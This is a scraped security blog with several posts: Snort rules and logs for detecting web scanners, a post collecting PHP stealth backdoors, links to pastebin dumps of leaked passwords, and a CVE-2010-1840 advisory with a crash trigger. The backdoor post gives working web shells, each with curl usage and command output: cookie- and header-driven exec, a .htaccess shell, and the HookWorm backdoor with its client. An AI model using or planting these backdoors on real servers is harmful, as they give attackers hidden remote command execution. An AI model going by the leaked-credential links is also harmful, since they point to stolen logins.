rfdslabs

” To temperance . . . in moderation. “

Aug

Detect Web Scanners

Posted by rfds Published in Hacking, Linux, Security

How to detect/block WebApp Scanners

Wikipedia said:

“A web application security is a program witch comunicates with a web application through the web front-end in order to identify potential security vulnerabilities in the web aplication and architectural weaknesses. “

The ideia about this is to explain how it’s simple to block this kind of scanners using mod_security (windows users should try URLScan) and Snort.
In my analysis i discovery a lot of patterns that this scanners use in your execution timeline. All scanners analyzed here have the same design execution erros in the analysis process.

This design erros are they always send the same requests to find the vulnerabilities in your plugins base, they never change the priority order of the requests, the same User Agent etc. So, mapping this requests it’s easy to create rules to block/detect this scanners.

Lets start with Nessus.

Nessus Scanner.

” The Nessus® vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture.” From Nessus Website.

I create for my analysis a profile with only the WEB APP plugins in nessus scanner.

The first common point in nessus web module is that he start the scanner with the same request. Look the log above:

Possible Snort Rule
alert tcp any any -> any any (content:"intruvert/jsp/admin/Login.jsp"; msg:"Possible Nessus Scanner"; sid 10000003;rev:1;)

The same User Agent:

Possible Snort Rule
alert tcp any any -> any any (content:”Nessus”; msg:”Possible Nessus Scanner”; sid 10000003;rev:1;)

2 Nikto

Nikto do the same requests:

127.0.0.1 – - [10/Jul/2010:21:49:52 -0300] “HEAD / HTTP/1.1″ 200 -
127.0.0.1 – - [10/Jul/2010:21:49:52 -0300] “GET / HTTP/1.1″ 200 -
127.0.0.1 – - [10/Jul/2010:21:49:53 -0300] “GET / HTTP/1.0″ 200 -
127.0.0.1 – - [10/Jul/2010:21:49:53 -0300] “GET /JNMaauje.htpasswd HTTP/1.0″ 404 215
127.0.0.1 – - [10/Jul/2010:21:49:53 -0300] “GET /JNMaauje.fhp HTTP/1.0″ 404 210
127.0.0.1 – - [10/Jul/2010:21:49:53 -0300] “GET /JNMaauje.xsql HTTP/1.0″ 404 211
127.0.0.1 – - [10/Jul/2010:21:49:53 -0300] “GET /JNMaauje.xml+ HTTP/1.0″ 404 211

OpenVAS With Web App Plugins

127.0.0.1 – “GET / HTTP/1.0″ 200 454 “-” “-”
127.0.0.1 – “GET / HTTP/1.0″ 200 454 “-” “-”
127.0.0.1 – “GET / HTTP/1.1″ 200 461 “-” “-”
127.0.0.1 – “GET / HTTP/1.1″ 200 454 “-” “-”
127.0.0.1 – “GET /limesurvey/admin/admin.php HTTP/1.1″ 404 502 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET /phpsurveyor/admin/admin.php HTTP/1.1″ 404 503 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET /survey/admin/admin.php HTTP/1.1″ 404 498 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET //admin/admin.php HTTP/1.1″ 404 491 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET /cgi-bin/admin/admin.php HTTP/1.1″ 404 499 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET /scripts/admin/admin.php HTTP/1.1″ 404 499 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”
127.0.0.1 – “GET /admin/admin.php HTTP/1.1″ 404 491 “-” “Mozilla/4.75 [en] (X11, U; Nessus)”

Nikto Web Scanner With IDSEVASION

127.0.0.1 – - [09/Nov/2010:09:08:09 -0300] “HEAD / HTTP/1.1″ 200 315 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET / HTTP/1.1″ 200 491 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.asa HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.html+ HTTP/1.1″ 404 527 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.nsf HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.prf HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.cellsprint HTTP/1.1″ 404 532 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.xbb HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.TPF HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.CGI HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.htw HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:10 -0300] “GET /5pgWiDQ2.vts HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”

127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “HEAD / HTTP/1.1″ 200 315 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET / HTTP/1.1″ 200 491 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.csp HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.2 HTTP/1.1″ 404 523 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.shm HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.idc HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.iso-ru HTTP/1.1″ 404 528 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.se HTTP/1.1″ 404 524 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6/ HTTP/1.1″ 404 522 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.fhp HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.eml HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.dpgs HTTP/1.1″ 404 526 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:06:02 -0300] “GET /R0OOgcA6.pl HTTP/1.1″ 404 524 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”

127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “HEAD / HTTP/1.1″ 200 315 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET / HTTP/1.1″ 200 491 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.SMAIL893 HTTP/1.1″ 404 530 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.dpgs HTTP/1.1″ 404 526 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.iso-ru HTTP/1.1″ 404 528 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.dbf HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.xsql HTTP/1.1″ 404 526 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.bat|dir HTTP/1.1″ 404 529 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.thtml HTTP/1.1″ 404 527 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.sys HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.shtml HTTP/1.1″ 404 527 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:08:49 -0300] “GET /btHyJEDP.nn HTTP/1.1″ 404 524 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)”

Without Evasions

127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “HEAD / HTTP/1.1″ 200 315 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:Port Check)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET / HTTP/1.1″ 200 491 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:getinfo)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.jsp HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.printer HTTP/1.1″ 404 529 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.utf8 HTTP/1.1″ 404 526 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.password HTTP/1.1″ 404 530 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.php HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.iso8859-8 HTTP/1.1″ 404 531 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.10:100 HTTP/1.1″ 404 528 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.properties HTTP/1.1″ 404 532 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:17 -0300] “GET /4BHHXLXB.pt-br HTTP/1.1″ 404 527 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”

127.0.0.1 – - [09/Nov/2010:09:09:53 -0300] “HEAD / HTTP/1.1″ 200 315 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:Port Check)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET / HTTP/1.1″ 200 491 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:getinfo)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.bin HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.pwd HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.TXT HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.es HTTP/1.1″ 404 524 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.log HTTP/1.1″ 404 525 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.tw HTTP/1.1″ 404 524 “-” “Mozilla/4.75
(Nikto/2.1.3) (Evasions:None) (Test:map_codes)”
127.0.0.1 – - [09/Nov/2010:09:09:54 -0300] “GET /FFrjb35O.2 HTTP/1.1″ 404 523 “-” “Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)”

(6 votes, average: 2.33 out of 5)

Loading ...

no comment

Jun

PHP Stealth Backdoors

Posted by rfds Published in Hacking

A PHP stealth backdoors collection.

1 -> Using cookie

<?php
@header(’Hidden-Field: '.@exec($_COOKIE['cmd']));
echo "<p>hello</p>";
?>

Example:

curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’

2 -> Using HTTP Headers

<?php
@header(’Hidden-Field: '.@exec($_COOKIE['cmd']));
echo "<p>hello</p>";
?>

Example:

curl -v ‘http://target/headers.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’

Output:

HTTP/1.1 200 OK!
Date: Wed, 06 Jun 2011 11:23:18 GMT!
Server: Apache
DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1!
Hidden-Field: uid=20(nobody) gid=20(nobody) groups=20(nobody)!
Content-Type: text/html

3 -> Base 64 Encode

<?php
if(isset($_COOKIE)) @header('Set-Cookie: PHPSESSID='.@base64_encode(@exec($_COOKIE ['cmd'])));
echo "<p>pown</p>";
?>

Example:

curl -v ‘http://target/base64.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6;fr; rv:1.9.4.5) Gecko/20110606 Firefox/4.4.3′ -e ‘http://www.google.com/’ -D shellog

$ cat shellog

HTTP/1.1 200 OK!
Date: Wed, 06 Jun 2011 11:23:18 GMT!
Server: Apache
DAV/2 PHP/5.3.1!X-Powered-By: PHP/5.3.1!
Set-Cookie:
PHPSESSID=dWlkPTcwKF93d3cpIGdpZD03MChfd3d3KSBncm91cHM9NzAoX3d3dyksMTAxKG
NvbS5hcHBsZS5zaGFyZXBvaW50Lmdyb3VwLjEpLDYxKGxvY2FsYWNjb3VudHMpLDEyKGV2Z
XJ5b25lKSw0MDIoY29tLmFwcGxlLnNoYXJlcG9pbnQuZ3JvdXAuMyksMTAyKGNvbS5hcHBsZS
5zaGFyZXBvaW50Lmdyb3VwLjIp
Content-Length: 12!
Content-Type: text/html!

Offline Base64 Decode:

uluwatu:~ rfdslabs$ python -c ‘import base64, sys; print base64.decodestring(sys.argv[1]);’ `cat shellog|grep ^Set-Cookie|cut -d ‘=’ -f 2`!

uid=20(nobody) gid=20(nobody) groups=20(nobody)

4 -> With Htaccess

# Self contained .htaccess web shell - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# Override default deny rule to make .htaccess file accessible over web
Order allow,deny
Allow from all
# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directoves from the .htaccess file
AddType application/x-httpd-php .htaccess
###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######

Simply upload the preferred shell as a .htaccess file and then visit the .htaccess file via the url http://domain/path/.htaccess?c=command for remote code execution.

By Eldar Marcussen

More in: http://www.justanotherhacker.com/projects/htshells/

Update Wed Jun 8 12:04:14 BRT 2011

5 -> The HookWorm

<?php if(isset($_COOKIE['wormcmd'])) {echo $_COOKIE['delim'] . shell_exec($_COOKIE['wormcmd']) . $_COOKIE['delim'];}?>

The Client:

<?php
echo "Enter the IP of the host to connect to:\n";
$host = trim(fgets(STDIN, 256));
echo "Host set to $host\n";
echo "Enter the relative path to the Hookworm (ex: /index.php):\n";
$file = trim(fgets(STDIN, 256));
echo "Enter the delimiter you'd like to use (ex: '***')";
$delim = trim(fgets(STDIN, 256));
if ($delim == '') $delim = "***"; // delimiter
while (1) {
	echo "hookworm> ";
	$command = trim(fgets(STDIN, 256));
	if ($command == 'quit' || $command == 'exit') break;
	$out = "GET $file HTTP/1.1\r\n";
	$out .= "Host: $host\r\n";
	$out .= "Connection: Close\r\n";
	$out .= "Cookie: wormcmd=$command; delim=$delim\r\n";
	$out .= "\r\n";
	if (!$fp=fsockopen($host,80, $errno, $errstr, 15))  return false;
	fwrite($fp, $out);
	$str = ""; 
	//read in a string which is the contents of the required file
	while (!feof($fp)) {
		$str.=fgets($fp, 512);
	}
	fclose($fp);
	$output_start = strpos($str,$delim)+strlen($delim);
	$output_end = strpos($str,$delim,$output_start);
	$output = substr($str, $output_start, $output_end $output_start);
	echo $output;
}
?>

Once the Hookworm is installed we can quickly connect to it using the command line and issue successive commands in a pseudo shell:

$ php hookworm.php
Enter the IP of the host to connect to:
192.168.1.3
Host set to 192.168.1.3
Enter the relative path to the Hookworm (ex: /index.php):
/index.php
Enter the delimiter you'd like to use (ex: '***'):
***
wormcmd> ls
c99.php
drupal-5.23
drupal-5.23.tar.gz
drupal-6.20
drupal-6.20.tar.gz
index.php
osticket_1.6.0
osticket_1.6.0.tar.gz
wormcmd> pwd
/var/www/html
wormcmd> quit
$

Any more?

References: www.tetri-security.com
www.cgisecurity.com
Eldar Marcussen
www.madirish.net

no comment

Mar

Information Disclosure with Pastebin.com

Posted by rfds Published in Fun, Hacking

The great Corelan released a tool to gathering information using www.pastebin.com

“Introduction

When conducting a pen-test, the process typically starts with the reconnaissance phase, the process of gathering information about your target(s) system, organization or person.

Today, we want to present a tool that can be added to your reconnaissance toolkit.

Text dump sites such as pastebin and pastie.org allow users to dump large amounts of text for sharing and storage….”

So i decide to search in pastebin.com words like: password, login, host:, pass= etc. For my ~~surprise~~ i found a lot of passwords and other things:

Uolbot Password:

http://pastebin.com/kJHs3PUC

A possible list of SQLinjections:

http://pastebin.com/sPiEVSeX

http://pastebin.com/jXYW0mAc

A tons of users and passwords:

http://pastebin.com/mST2m26G

http://pastebin.com/asYUufMq

http://pastebin.com/ppH8HLur

http://pastebin.com/w81x1fJp

http://pastebin.com/gVZLayx4

…

A lame PHPUdp Flooder

http://pastebin.com/mfiAwRzN

#fail

3 comments

Jan

My First PC CASE!

Posted by rfds Published in Fun, Geek

OHH YEAH
I found the front of my first computer. A 80486DX2. The name MANTEL was the company where my father bought the computer. Amazing!

1 comment

Nov

Apple Directory Services Memory Corruption - CVE-2010-1840

Posted by rfds Published in Hacking, Security

From: Rodrigo Branco
Date: Thu, 11 Nov 2010 01:12:51 -0800
Dear List,

I’m writing on behalf of the Check Point Vulnerability Discovery Team to publish the following vulnerability.

Check Point Software Technologies – Vulnerability Discovery Team (VDT)

http://www.checkpoint.com/defense/

Apple Directory Services Memory Corruption
CVE-2010-1840

INTRODUCTION

chfn, chpass and chsh dos not properly parse authname switch (“-u”), which causes the applications to crash when
parsing a long string. Those binaries are setuid root by default.

This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected:

Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh
Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh

CVSS Scoring System

The CVSS score is: 3.3
Base Score: 4.2
Temporal Score: 3.3
We used the following values to calculate the scores:
Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C
Temporal score is: E:POC/RL:OF/RC:C

TRIGGERING THE PROBLEM

/usr/bin/chfn -u `perl -e ‘print “A” x 3000′`
/usr/bin/chsh -u `perl -e ‘print “A” x 3000′`
/usr/bin/chpass -u `perl -e ‘print “A” x 3000′`

DETAILS

Disassembly:

0×92237215 : mov $0×28,%al
0×92237217 : cmp $0xc,%ecx
0x9223721a : mov $0×14,%dl
0x9223721c : cmovne %edx,%eax
0x9223721f : add %esi,%eax
0×92237221 : mov 0xc(%ebp),%edx
0×92237224 : lea (%eax,%edx,4),%eax
0×92237227 : mov (%eax),%eax <----- Crash here.

(gdb) x/i $pc
0x92237227 : mov (%eax),%eax
(gdb) i r $eax
eax 0x585d910 92657936
(gdb) bt
#0 0×92237227 in CFArrayGetValueAtIndex ()
#1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()
#2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()
#3 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()
#5 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#6 0x9225b50c in CFBundleCopyResourceURL ()
#7 0x9225bb32 in CFBundleCopyLocalizedString ()
#8 0x903633eb in _ODNodeSetCredentials ()
#9 0×90369813 in ODRecordSetNodeCredentials ()
#10 0x000044be in ?? ()
#11 0x000026ac in ?? ()
#12 0x000022ee in ?? ()